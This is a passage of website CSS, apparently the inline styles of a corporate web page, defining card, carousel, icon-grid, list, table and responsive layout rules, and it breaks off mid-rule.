.two-column .illustration-icon-grid-item-content{height:auto;}.illustration-icon-grid-3x1{grid-template-columns:1fr;grid-template-rows:repeat(3,auto);}.illustration-icon-grid-4x1{grid-template-columns:1fr 1fr;grid-template-rows:repeat(2,auto);}.illustration-icon32-clickable-list,.illustration-icon32-clickable-list-3-per-row{grid-template-columns:1fr 1fr;grid-template-rows:repeat(3,auto);}.illustration-clickable-list-split-grid-2x2-container,.illustration-icon32-split-grid-2x2-container{grid-template-columns:1fr;grid-template-rows:auto auto;}.illustration-clickable-list-split-grid-2x2-container .illustration-clickable-list-split-grid-2x2,.illustration-icon32-split-grid-2x2-container .illustration-icon32-split-grid-2x2{grid-template-columns:1fr 1fr;grid-template-rows:repeat(1,auto);}.illustration-icon32-grid-2x2{grid-template-columns:1fr;grid-template-rows:repeat(4,auto);}.illustration-icon32-grid-3x2{grid-template-columns:1fr 1fr;grid-template-rows:repeat(3,auto);}.illustration-clickable-list-split-grid-2x2-container,.illustration-icon32-split-grid-2x2-container{grid-row-gap:32px;}.illustration-icon64-grid-3x1{grid-template-columns:1fr;grid-template-rows:repeat(3,auto);}.illustration-icon64-grid-5x1-container{grid-template-columns:1fr 1fr 1fr;grid-template-rows:repeat(3,auto);}}@media screen and (max-width:575px){.card-grid-2x1{grid-template-columns:1fr;grid-template-rows:repeat(2,auto);}.card-grid-3x1{grid-template-columns:1fr;grid-template-rows:repeat(3,auto);}.card-grid-4x1{grid-template-columns:1fr;grid-template-rows:repeat(4,auto);}}@media screen and (max-width:479px){.illustration-icon32-clickable-list,.illustration-icon32-clickable-list-3-per-row{grid-template-columns:1fr;grid-template-rows:repeat(6,auto);}.illustration-icon-grid-4x1{grid-template-columns:1fr;grid-template-rows:repeat(4,auto);}.illustration-icon32-grid-3x2{grid-template-columns:1fr;grid-template-rows:repeat(6,auto);}.illustration-clickable-list-split-grid-2x2-container,.illustration-icon32-split-grid-2x2-container{grid-row-gap:16px;}.illustration-clickable-list-split-grid-2x2-container .illustration-icon32-split-grid-2x2,.illustration-icon32-split-grid-2x2-container .illustration-icon32-split-grid-2x2{grid-template-columns:1fr;grid-template-rows:repeat(4,auto);}.illustration-clickable-list-split-grid-2x2-container,.illustration-icon32-split-grid-2x2-container{grid-template-columns:1fr;grid-template-rows:auto auto;}.illustration-icon64-grid-5x1-container{grid-template-columns:1fr 1fr;grid-template-rows:repeat(2,auto);}}</style><style id="__jsx-1653982606">.image.jsx-1653982606 img.full-width.jsx-1653982606{width:100vw;}.image.jsx-1653982606 figure.jsx-1653982606 figcaption.jsx-1653982606{margin:8px 0 0;}.image.jsx-1653982606 figure.jsx-1653982606 figcaption.jsx-1653982606 p.jsx-1653982606{margin-bottom:0;}</style><style id="__jsx-2477493165">.video iframe{height:100% !important;}.video .shadow-light{overflow:hidden;}</style><style id="__jsx-1443386464">.card-list{display:flex;}.card-list .card-wrapper{flex:1;position:relative;height:fit-content;}@media (min-width:576px){.card-list .card-wrapper{height:unset;}}.card-list .badge{text-transform:uppercase;font-weight:600;line-height:1.8333333333;letter-spacing:0.1em;color:#fff;text-align:center;margin-bottom:-12px;width:100%;padding:12px 0 24px;border-top-left-radius:10px;border-top-right-radius:10px;}@media (min-width:576px){.card-list .badge{position:absolute;transform:translateY(-75%);margin-bottom:0;}}.card-list .card-container.card{height:100%;background:#fff;display:flex;flex-direction:column;justify-content:space-between;overflow:hidden;margin:0px;-moz-transition:all 0.4s ease;-webkit-transition:all 0.4s ease;-o-transition:all 0.4s ease;-ms-transition:all 0.4s ease;transition:all 0.4s ease;}.card-list .card-container.card:hover{-moz-box-shadow:0px 5px 24px rgba(0,0,0,0.12);-webkit-box-shadow:0px 5px 24px rgba(0,0,0,0.12);-o-box-shadow:0px 5px 24px rgba(0,0,0,0.12);-ms-box-shadow:0px 5px 24px rgba(0,0,0,0.12);box-shadow:0px 5px 24px rgba(0,0,0,0.12);}.card-list .card-container.card .card-topic-heading.pill{background:var(--color-light-teal);padding:6px 16px;display:inline-block;border-radius:42px;margin-bottom:24px;}.card-list .card-container.card .card-topic-heading.pill h2{padding:0;color:var(--color-dark-teal);}.card-list .card-container.card .card-icon-heading{display:flex;align-items:center;}.card-list .card-container.card .card-icon-heading h2{padding-bottom:0;}.card-list .card-container.card .card-header{background:none;padding:0;border-bottom:0px none;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;}.card-list .card-container.card .card-title{color:var(--headings-color);margin-bottom:0;word-break:break-word;}.card-list .card-container.card .card-paragraph{color:var(--body-color);}.card-list .card-container.card .card-paragraph .pricing{margin-top:16px;}.card-list .card-container.card .card-paragraph .pricing p{margin-bottom:4px;}.card-list .card-container.card .card-paragraph .pricing h4{font-weight:700;font-size:1.75rem;padding-bottom:4px;}.card-list .card-container.card .card-icon-heading .icon-32,.card-list .card-container.card .card-image .icon-32{width:32px;height:32px;margin:0px 16px 16px 0px;}.card-list .card-container.card .card-icon-heading .icon-64,.card-list .card-container.card .card-image .icon-64{width:64px;height:64px;margin:0px 16px 16px 0px;}.card-list .card-container.card .card-icon-heading .image-xsmall,.card-list .card-container.card .card-image .image-xsmall{width:128px;height:128px;margin-bottom:16px;}.card-list .card-container.card .card-icon-heading .logo,.card-list .card-container.card .card-image .logo{height:64px;max-width:120px;margin:0px 16px 16px 0px;}.card-list .card-container.card .card-icon-heading .logo-small,.card-list .card-container.card .card-image .logo-small{height:64px;max-width:120px;margin:0px 16px 16px 0px;}.card-list .card-container.card .card-icon-heading.thumbnail-wrapper,.card-list .card-container.card .card-image.thumbnail-wrapper{margin-bottom:32px;border:1px solid var(--color-dark-gray);}.card-list .card-container.card .card-icon-heading.thumbnail-wrapper img.thumbnail,.card-list .card-container.card .card-image.thumbnail-wrapper img.thumbnail{border-radius:10px;}.card-list .card-container.card.paragraph-left .card-paragraph{text-align:left;}.card-list .card-container.card.paragraph-center .card-paragraph{text-align:center;}.card-list .card-container.card.title-heading-left .title-wrapper{text-align:left;}.card-list .card-container.card.title-heading-center .title-wrapper{text-align:center;}.card-list .card-container.card.topic-heading-left .topic-heading{text-align:left;}.card-list .card-container.card.topic-heading-center .topic-heading{text-align:center;}.card-list .card-container.card .card-footer{background:none !important;padding:0px;border:0px;}.card-list .card-container.card .card-footer .btn-tertiary{padding-top:16px;margin-bottom:8px;}.card-list .card-container.card .card-footer .cta-arrow a img{width:27px;height:20px;transition:all 500ms cubic-bezier(0.19,1,0.22,1);}.card-list .card-container.card .card-footer .inline-flex-align-items-baseline{display:flex;flex-direction:row;flex-wrap:wrap;align-items:baseline;}.card-list .card-container.card .card-footer .inline-flex-align-items-baseline .text-link{margin-left:16px;}.card-list .card-container.card .card-footer .d-flex.flex-column a{width:100%;}.card-list .card-container.card .card-footer .cta-arrow{text-align:left !important;}.card-list .card-container.card .card-footer .btn-primary.icon-left,.card-list .card-container.card .card-footer .btn-secondary.icon-left,.card-list .card-container.card .card-footer .text-link.icon-left{display:flex;flex-direction:row-reverse;}.card-list .card-container.card .card-footer .btn-primary.icon-right,.card-list .card-container.card .card-footer .btn-secondary.icon-right,.card-list .card-container.card .card-footer .text-link.icon-right{display:flex;flex-direction:row;}.card-list .card-container.card .card-footer .btn-primary.icon-left img,.card-list .card-container.card .card-footer .btn-secondary.icon-left img,.card-list .card-container.card .card-footer .text-link.icon-left img{padding-right:8px;}.card-list .card-container.card .card-footer .btn-primary.icon-right img,.card-list .card-container.card .card-footer .btn-secondary.icon-right img,.card-list .card-container.card .card-footer .text-link.icon-right img{padding-left:8px;}.card-border{position:absolute;border-style:none;border-width:1px;}.card-border.card-border-top{left:0px;top:0px;right:0px;bottom:auto;height:6px;max-height:6px;}.card-list .card-container.card-ghost{border:0px;border-bottom:1px solid var(--color-dark-gray) !important;box-shadow:none !important;cursor:pointer;}.card-list .card-container.card-ghost .card-title a,.card-list .card-container.card-ghost .card-title a:visited{text-decoration:none;color:inherit;}.card-list .card-container.card-ghost .card-title h3{text-decoration:none;}.card-list .card-container.card-ghost .card-footer{padding-bottom:32px;}.card-list .card-container.card-ghost .thumbnail-wrapper{overflow:hidden;position:relative;border-radius:10px;}.card-list .card-container.card-ghost .thumbnail-wrapper .thumbnail{transition:transform 250ms ease-in-out,-webkit-transform 250ms ease-in-out;width:100%;height:unset;object-fit:cover;position:relative;z-index:0;min-height:129px;}.card-list .card-container.card-ghost:hover img.thumbnail{transform:scale(1.1);}.card-list .card-container.card-ghost:hover .card-title h3{text-decoration:underline;}.card-list .card-container.card-ghost:hover .card-paragraph p{opacity:0.8;text-decoration:none;}.card-container.card-outline{border:1px solid var(--color-dark-gray) !important;}.card-container.card-outline-none{border:0px !important;}.card-content-left .card-title,.card-content-left .card-paragraph,.card-content-left .topic-heading{text-align:left;}.card-content-center .card-title,.card-content-center .card-paragraph,.card-content-center .topic-heading{text-align:center;}.card-image-left .card-image{text-align:left;}.card-image-center .card-image{text-align:center;}@media screen and (max-width:991){.card-container.card .card-footer .inline-flex-align-items-baseline{flex-direction:column;align-items:none;}.card-container.card .card-footer .inline-flex-align-items-baseline a{width:100%;}}</style><style id="__jsx-887545163">.carousel .carousel-two-column__tab-labels-left .carousel-heading .heading{font-family:'MierB','Inter',Arial,sans-serif;font-size:1rem;line-height:1.5rem;font-weight:400;}.carousel .carousel-two-column__tab-labels-left .carousel-heading:hover{margin-left:-2px;}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab-list{border-bottom:0;border-left:1px solid var(--color-dark-gray);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab{padding:8px 16px;}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab:hover{margin-bottom:0px;border-left:2px solid var(--color-black);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected{border-left:2px solid var(--color-elastic-blue);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected:hover{border-color:var(--color-elastic-blue);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected .carousel-heading{margin-left:-2px;}.carousel .carousel-two-column__tab-labels-left-accordion .carousel-heading{color:var(--color-black);cursor:pointer;padding:16px 16px 0 16px;position:relative;}.carousel .carousel-two-column__tab-labels-left-accordion .carousel-heading .heading{font-family:'MierB','Inter',Arial,sans-serif;padding-bottom:16px;font-size:1rem;line-height:1.5rem;font-weight:400;padding-right:24px;}.carousel .carousel-two-column__tab-labels-left-accordion .carousel-body{padding:0px 16px 16px;}.carousel .carousel-two-column__tab-labels-left-accordion .d-lg-none.carousel-asset{margin:32px 8px;}.carousel .carousel-two-column__tab-labels-left-accordion .react-tabs__tab{cursor:pointer;margin:-1px 0px 0px 0px;padding:0;border-top:1px solid #D4DAE5;border-bottom:1px solid #D4DAE5;border-left:2px solid transparent;}.carousel .carousel-two-column__tab-labels-left-accordion .react-tabs__tab--selected{background-color:var(--color-white);box-shadow:0 10px 20px 10px rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25);cursor:text;border-top:1px none var(--color-dark-gray);border-bottom:1px none var(--color-dark-gray);border-left:2px solid var(--color-elastic-blue);}.carousel .carousel-two-column__tab-labels-left-accordion .react-tabs__tab--selected .arrow:after{top:26px;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);}.carousel .carousel-two-column__tab-labels-left-accordion .arrow:after{content:"";height:12px;position:absolute;right:19px;top:20px;width:12px;border-top:1px solid var(--color-elastic-blue);border-left:1px solid var(--color-elastic-blue);-webkit-transform:rotate(-135deg);-moz-transform:rotate(-135deg);-ms-transform:rotate(-135deg);transform:rotate(-135deg);-moz-transition:transform 0.4s;-webkit-transition:transform 0.4s;-o-transition:transform 0.4s;-ms-transition:transform 0.4s;transition:transform 0.4s;}.carousel .carousel-two-column__tab-labels-left-accordion .close-acc .arrow:after{top:20px;-webkit-transform:rotate(-135deg);-moz-transform:rotate(-135deg);-ms-transform:rotate(-135deg);transform:rotate(-135deg);}.carousel .carousel-two-column__tab-labels-left-accordion .up-arrow:after{top:26px;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);}.carousel .show{display:block;}.carousel .hidden{display:none;}@media screen and (max-width:767px){.carousel .carousel-two-column__tab-labels-left .carousel-heading:hover{margin-left:0px !important;}.carousel .carousel-two-column__tab-labels-left .carousel-tabs{display:flex;align-content:center;justify-content:center;margin-bottom:16px;}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab{border-left:none !important;}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab-list{display:flex;flex-direction:row;justify-content:center;flex-wrap:wrap;border-left:none !important;border-bottom:1px solid var(--color-dark-gray) !important;width:100%;}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected{border-left:none !important;border-bottom:2px solid var(--color-elastic-blue);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected:hover{border-color:var(--color-elastic-blue);}.carousel .carousel-two-column__tab-labels-left .react-tabs__tab--selected .carousel-heading{margin-left:0px !important;}}</style><style id="__jsx-579451128">.default-detail section.hasBackground:nth-last-child(2)+.layout,.default-detail section.bg-light-gray:nth-last-child(2)+.layout,.default-detail div.bg-light-gray:nth-last-child(2)+.layout,.default-detail section.bg-developer-blue:nth-last-child(2)+.layout,.default-detail div.bg-developer-blue:nth-last-child(2)+.layout,.default-detail section.bg-light-gray:nth-last-child(2)+.layout,.default-detail section.bg-developer-blue:nth-last-child(2)+.layout{height:0;}.default-detail .quote .flex-items-wrapper .img-fluid{max-height:64px;}.default-detail .social-card .card{overflow:visible;}.default-detail #dl_calculator embed{height:100vh !important;}.default-detail #dl_calculator .customizable_chart_header{width:100% !important;}.default-detail p.note{font-size:0.75rem;color:var(--color-ink);font-weight:normal;margin-bottom:8px;text-transform:none;}.default-detail .footer-cta .mkto-form-wrapper.inline.center{display:flex;justify-content:center;}.default-detail .title-text-one-column h3{margin:40px 0px 0px;}.default-detail .title-text-one-column h3:first-child{margin-top:20px;}.default-detail .icon-grid+.image,.default-detail .icon-grid+.features{margin-top:-50px;}.default-detail .pricing{margin-bottom:-40px;}.default-detail .image-text-grid .card-deck .card .title-text-cta.card-body{display:flex;flex-direction:column;}.default-detail .editorial-molecule:hover .title-link .title{text-decoration:underline;}@media screen and (max-width:991px) and (min-width:481px){.listing-sidebar .sidebar-wrapper .sidebar .tab-column{display:flex;flex-direction:column;}.right-column{padding-top:64px;}.editorial-molecule{border-bottom:1px solid var(--color-dark-gray);padding-bottom:64px;}}@media screen and (max-width:767px) and (min-width:481px){.editorial-molecule .molecule{display:flex;flex-direction:row;}.editorial-molecule .molecule .thumbnail{height:max-content !important;}.editorial-molecule .molecule .title-link{margin:0;}}@media screen and (max-width:480px){.editorial-molecule{border-bottom:1px solid var(--color-dark-gray);padding-bottom:48px;}.right-column{padding-top:48px;}}@media screen and (max-width:375px){.default-detail .common-container{max-width:255px;word-break:break-word;}}</style><style id="__jsx-2923087917">@charset "UTF-8";html,body{-webkit-font-smoothing:antialiased;position:relative;color:var(--body-color);}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{margin:0;box-sizing:border-box;display:block;position:relative;}h1 a,h2 a,h3 a,h4 a,h5 a,h6 a,.h1 a,.h2 a,.h3 a,.h4 a,.h5 a,.h6 a{font-weight:400;text-decoration:none;font-weight:unset;}h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover,h5 a:hover,h6 a:hover,.h1 a:hover,.h2 a:hover,.h3 a:hover,.h4 a:hover,.h5 a:hover,.h6 a:hover{text-decoration:none;font-weight:unset;}h1 a:hover:hover,h2 a:hover:hover,h3 a:hover:hover,h4 a:hover:hover,h5 a:hover:hover,h6 a:hover:hover,.h1 a:hover:hover,.h2 a:hover:hover,.h3 a:hover:hover,.h4 a:hover:hover,.h5 a:hover:hover,.h6 a:hover:hover{text-decoration:none;}p{margin:0 0 8px 0;}strong,b{font-weight:700;}i,em{font-style:italic;}sub{position:relative;top:0.5em;font-size:0.8em;}sup{position:relative;top:-0.5em;font-size:0.8em;}hr{border-color:var(--color-dark-gray);}hr.custom-2{border-width:2px;}small{line-height:26px;font-size:12px;font-weight:400;}ul,ul li{background:none;list-style-type:none;margin:0;padding:0;}ul ul,ul li ul{margin-top:4px;}ul.list-green,ul.list-black,ul.list_arrows,.service-list ul,.title-text ul,.main-content-wrapper ul,.video-detail ul,.webinar-archive ul,.course-tabs .course-tab-list .react-tabs__tab-panel ul,.course-tabs .course-accordion ul,.title-text-desc ul{list-style:none;margin-top:8px;margin-bottom:8px;}ul.list-green li,ul.list-black li,ul.list_arrows li,.service-list ul li,.title-text ul li,.main-content-wrapper ul li,.video-detail ul li,.webinar-archive ul li,.course-tabs .course-tab-list .react-tabs__tab-panel ul li,.course-tabs .course-accordion ul li,.title-text-desc ul li{list-style:none;font-weight:normal;padding-left:15px;margin:0 0 8px 15px;}ul.list-green li:before,ul.list-black li:before,ul.list_arrows li:before,.service-list ul li:before,.title-text ul li:before,.main-content-wrapper ul li:before,.video-detail ul li:before,.webinar-archive ul li:before,.course-tabs .course-tab-list .react-tabs__tab-panel ul li:before,.course-tabs .course-accordion ul li:before,.title-text-desc ul li:before{content:"•";color:var(--color-dark-teal);display:inline-block;margin-left:-20px;width:20px;}ul.list-green li p,ul.list-black li p,ul.list_arrows li p,.service-list ul li p,.title-text ul li p,.main-content-wrapper ul li p,.video-detail ul li p,.webinar-archive ul li p,.course-tabs .course-tab-list .react-tabs__tab-panel ul li p,.course-tabs .course-accordion ul li p,.title-text-desc ul li p{display:inline;}ul.list-icon-check{list-style:none;}ul.list-icon-check li{list-style:none;font-weight:normal;padding-left:24px;margin:0 0 10px 5px;position:relative;}ul.list-icon-check li:before{border:1px solid var(--color-elastic-teal);border-width:0 2px 2px 0;content:"";height:13px;left:0;position:absolute;top:4px;width:8px;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);}ol{margin-top:8px;margin-bottom:8px;padding-left:32px;}ol li{margin-bottom:8px;}ol li ol{margin:16px 0;}ol.lower-alpha{list-style-type:lower-alpha;}ol.upper-roman{list-style-type:upper-roman;}.blog .container ul:not(.card-grid),.webinar-wrap ul{list-style:none;}.blog .container ul:not(.card-grid) li,.webinar-wrap ul li{list-style:none;font-weight:normal;padding-left:15px;margin:0 0 10px 20px;}.blog .container ul:not(.card-grid) li:before,.webinar-wrap ul li:before{content:"•";color:var(--color-dark-teal);display:inline-block;margin-left:-20px;width:20px;}.blog .container ul.no-bullets{list-style:none;}.blog .container ul.no-bullets li{list-style:none;font-weight:normal;padding:0;margin-left:0 !important;}.blog .container ul.no-bullets li:before{content:"";}.featured-list li{list-style-type:none;margin-top:80px;margin-bottom:80px;}.featured-list li p{margin-bottom:0;}.featured-list li:first-child{margin-top:60px;}.featured-list li img{margin-right:auto;margin-left:auto;}table,dl,dt,dd,tbody,tfoot,thead,tr,th,td{line-height:26px;word-break:keep-all;}.table-responsive{margin-top:32px;width:100%;}.table-responsive table,.table-responsive table td{border:1px solid var(--color-light-gray);}.table-responsive table th,.table-responsive table td th{text-align:center;font-weight:600;}.table-responsive table td,.table-responsive table td td{padding:10px;}.table-responsive th,.table-responsive td{padding:16px;}.table-center-text th,.table-left-text th{border-bottom:2px solid var(--color-dark-gray);background-color:var(--color-white) !important;font-weight:bold;font-size:14px;line-height:24px;}.table-center-text tr:nth-child(odd),.table-left-text tr:nth-child(odd){background-color:var(--color-light-gray);}.table-left-text tr td{text-align:left;}.table-center-text tr td{text-align:center;}.table-left-text-label-column th{border-bottom:2px solid var(--color-dark-gray);background-color:var(--color-white) !important;font-weight:bold;}.table-left-text-label-column tr:nth-child(odd){background-color:var(--color-light-gray);}.table-left-text-label-column tr th:nth-child(2),.table-left-text-label-column tr td:nth-child(2){border-left:2px solid var(--color-dark-gray) !important;}.table-left-text-label-column td:first-child{font-weight:bold;text-align:left;}.table-merged-cells{border:1px solid var(--color-dark-gray);text-align:center;}.table-merged-cells td{border:1px solid var(--color-dark-gray);background-color:var(--color-white) !important;}.table-merged-cells th{background-color:var(--color-light-gray) !important;border:1px solid var(--color-dark-gray);}blockquote{border-left:5px solid var(--color-elastic-teal);padding-left:20px;line-height:32px;font-size:20px;font-weight:400;}.clearfix:before,.clearfix:after{content:" ";display:table;}.clearfix:after{clear:both;}.common-container{width:100%;max-width:748px;margin-right:auto;margin-left:auto;}.full-width-features{padding-left:15px;padding-right:15px;width:100%;}.paragraph-caption,.paragraph-caption p{font-size:12px;font-style:normal;font-weight:400;line-height:130%;margin:16px 0 8px 0;text-decoration:none;}.nowrap{color:#fff;font-size:18px;white-space:nowrap;}.unscroll{position:fixed;width:100%;}code{display:inline;white-space:normal;}code pre{box-sizing:border-box;-moz-box-sizing:border-box;webkit-box-sizing:border-box;display:inline-block;white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-pre-wrap;white-space:-o-pre-wrap;word-wrap:break-word;width:100%;overflow-x:auto;-webkit-border-radius:0px;-moz-border-radius:0px;-ms-border-radius:0px;border-radius:0px;}pre{box-sizing:border-box;-moz-box-sizing:border-box;webkit-box-sizing:border-box;display:inline-block;white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-pre-wrap;white-space:-o-pre-wrap;word-wrap:break-word;width:100%;overflow-x:auto;}pre.prettyprint{background-color:#f0f0f0;font-size:15px;margin-bottom:15px;padding:10px;word-break:break-word !important;white-space:pre-wrap !important;border-top:0px none;border-right:0px none;border-bottom:0px none;border-left:3px solid #39BDB1;-webkit-border-radius:0px;-moz-border-radius:0px;-ms-border-radius:0px;border-radius:0px;}span[data-type=inlineCode]{display:inline;white-space:normal;font-size:87.5%;color:var(--color-dark-pink);word-break:break-word;font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;}.literal{background:#f0f0f0;color:#555;display:inline;padding:0 5px;vertical-align:middle;width:auto;white-space:normal;}.grey-bg{background:#f7f7f7;}.white-bg{background-color:#fff;}.bdr-btm-e0e0e0{border-bottom:1px solid #ccc;}.bdr-btm-ccc{border-bottom:1px solid #ccc;}.intro-paragraph{line-height:29px;font-size:18px;}.intro-paragraph p{line-height:29px;font-size:18px;}.white-box{background-color:#fff;box-shadow:0px 10px 20px 0px rgba(152,162,179,0.15),0px 2px 6px 0px rgba(152,162,179,0.25);padding:20px;}.form-control:focus{-moz-box-shadow:none;-webkit-box-shadow:none;-o-box-shadow:none;-ms-box-shadow:none;box-shadow:none;}.note{margin-bottom:20px;color:#f00;font-weight:600;text-transform:uppercase;}.quotes{height:120px;opacity:0.5;filter:alpha(opacity=50);}.grey-border-box{-webkit-box-align:center;align-items:center;-webkit-box-pack:justify;justify-content:space-between;width:100%;max-width:825px;border:1px solid rgb(212,218,229);border-radius:10px;background:rgb(255,255,255);padding:16px;font-size:14px;line-height:24px;}.grey-border-box p{font-size:14px;line-height:24px;}.grey-border-box a{line-height:26px;font-size:16px;}.grey-border-box .white-block{display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;}.grey-border-box .white-block span{color:#0078a0;display:inline-block;line-height:60px;text-align:center;width:60px;height:60px;font-size:24px;font-weight:600;border-top:1px solid #0078a0;border-right:1px solid #0078a0;border-bottom:1px solid #0078a0;border-left:1px solid #0078a0;-webkit-border-radius:50%;-moz-border-radius:50%;-ms-border-radius:50%;border-radius:50%;}.skip-links{position:absolute;top:8px;left:8px;z-index:9999;}.skip-links .euiSkipLink{color:#fff;padding:8px 24px;font-size:0.875rem;font-weight:bold;line-height:1.5;min-height:40px;border:2px solid #0B64DD;border-radius:5px;text-decoration:none;position:relative;}.skip-links .euiSkipLink:hover{color:#005A9E;}.skip-links .euiSkipLink:focus{color:#fff;text-decoration:none;}@media screen and (min-width:992px){.statistics-title{color:var(--color-blurple);font-size:140px;line-height:130%;}.statistics-title-percent{color:var(--color-blurple);font-size:70px;line-height:200%;}.statistics-title-80px{color:var(--color-blurple);font-family:'Space Mono',monospace;font-size:80px;line-height:80%;}.statistics-title-percent-80px{color:var(--color-blurple);font-family:'Space Mono',monospace;font-size:50px;line-height:90%;}}@media screen and (max-width:991px){.statistics-title{color:var(--color-blurple);font-size:110px;line-height:105%;}.statistics-title-percent{color:var(--color-blurple);font-size:55px;line-height:150%;}.statistics-title-80px{color:var(--color-blurple);font-family:'Space Mono',monospace;font-size:80px;line-height:80%;}.statistics-title-percent-80px{color:var(--color-blurple);font-family:'Space Mono',monospace;font-size:50px;line-height:90%;}}@media screen and (max-width:767px){.grey-border-box{display:block;}.grey-border-box .col{display:block;float:none;width:100%;}.grey-border-box .white-block{border-bottom:1px solid #ccc;border-right:0 none;-webkit-border-radius:6px 6px 0 0;-moz-border-radius:6px 6px 0 0;-ms-border-radius:6px 6px 0 0;border-radius:6px 6px 0 0;padding-bottom:55px;}.grey-border-box .product-icon{position:relative;top:50%;margin-bottom:-52px;right:0;bottom:0;left:50%;z-index:100;-webkit-transform:translate(-50%,-50%);-moz-transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%);}}img.greyscale{filter:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg'><filter ….2525 0 0 0.2525 0.2525 0.2525 0 0 0 0 0 1 0'/></filter></svg>#greyscale");filter:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg'><filter id='greyscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#greyscale");filter:grey;-webkit-filter:greyscale(100%);-webkit-backface-visibility:hidden;}.shadow-light{-moz-box-shadow:0 10px 20px 0 rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25) !important;-webkit-box-shadow:0 10px 20px 0 rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25) !important;-o-box-shadow:0 10px 20px 0 rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25) !important;-ms-box-shadow:0 10px 20px 0 rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25) !important;box-shadow:0 10px 20px 0 rgba(152,162,179,0.1),0 2px 6px 0 rgba(152,162,179,0.25) !important;}.shadow-dark{-moz-box-shadow:0 10px 20px 0 rgba(83,89,102,0.1),0 2px 6px 0 rgba(83,89,102,0.25) !important;-webkit-box-shadow:0 10px 20px 0 rgba(83,89,102,0.1),0 2px 6px 0 rgba(83,89,102,0.25) !important;-o-box-shadow:0 10px 20px 0 rgba(83,89,102,0.1),0 2px 6px 0 rgba(83,89,102,0.25) !important;-ms-box-shadow:0 10px 20px 0 rgba(83,89,102,0.1),0 2px 6px 0 rgba(83,89,102,0.25) !important;box-shadow:0 10px 20px 0 rgba(83,89,102,0.1),0 2px 6px 0 rgba(83,89,102,0.25) !important;}figure{margin:0;text-align:center;}figure i,.border-circle{background-position:center center;background-repeat:no-repeat;background-size:120% auto;display:block;height:170px;margin:0 auto;overflow:hidden;width:170px;border-top:6px solid #ccc;border-right:6px solid #ccc;border-bottom:6px solid #ccc;border-left:6px solid #ccc;-webkit-border-radius:340px;-moz-border-radius:340px;-ms-border-radius:340px;border-radius:340px;}figcaption{text-align:center;font-size:14px;line-height:24px;font-style:italic;}.circle-bg{background:#fff;-webkit-border-radius:104px;-moz-border-radius:104px;-ms-border-radius:104px;border-radius:104px;-moz-box-shadow:0px 2px 5px rgba(0,0,0,0.2);-webkit-box-shadow:0px 2px 5px rgba(0,0,0,0.2);-o-box-shadow:0px 2px 5px rgba(0,0,0,0.2);-ms-box-shadow:0px 2px 5px rgba(0,0,0,0.2);box-shadow:0px 2px 5px rgba(0,0,0,0.2);width:104px;height:104px;position:relative;display:inline-block;z-index:1;}.circle-bg img{bottom:0;height:70%;left:0;margin:auto;position:absolute;right:0;top:0;width:70%;}.circle-bg:before{content:" ";vertical-align:middle;height:100%;}.circle-bg .graph-img-center{left:6px;}.image-32-icon{height:32px !important;margin:0 0 16px !important;width:32px !important;}.image-64-icon{height:64px !important;margin:0 auto 16px !important;width:64px !important;}.onlyFadeIn{-webkit-animation:onlyFadeIn 1s;animation:onlyFadeIn 1s;}@-webkit-keyframes onlyFadeIn{0%{opacity:0;}100%{opacity:1;}}@keyframes onlyFadeIn{0%{opacity:0;}100%{opacity:1;}}.img-overflow{max-width:100%;height:auto;}@media (min-width:992px){.img-overflow{max-width:unset;max-height:500px;}}.embed-container iframe,.video iframe{border:0;height:287px;width:100%;}.play-icon{bottom:0;display:block;height:50px;left:0;margin:auto;position:absolute;right:0;top:0;z-index:2;}.video-thumb{position:relative;display:inline-block;max-width:100%;border-radius:10px;overflow:hidden;}.video-thumb .play-btn{bottom:0;height:64px;left:0;margin:auto;position:absolute;right:0;top:0;width:64px;}@media screen and (max-width:600px){.video-thumb{max-width:295px;}}.video-content-wrapper h3{color:var(--color-dark-blue);}.video-content-wrapper h3 a{color:var(--color-dark-blue);}.right-arrow{background-image:url(/static-res/images/right-blue-arrow.png);background-repeat:no-repeat;background-position:right 4px;padding-right:25px !important;color:#00a9e5;font-size:16px;display:inline-block;}.right-arrow:hover{color:#00a9e5;}.right-arrow .upgrade-icon{background-image:url(/static-res/images/refresh-icon.svg);background-repeat:no-repeat;background-position:0px 0px;display:inline-block;height:17px;padding-left:28px;vertical-align:middle;}.right-arrow:before{content:" ";vertical-align:middle;height:100%;}.right-arrow .graph-img-center{left:6px;}.checkmark{height:63px;width:63px;}.position-relative{position:relative;}.position-absolute{position:absolute;}@media screen and (min-width:768px) and (max-width:991px){.container{max-width:100% !important;}}@media screen and 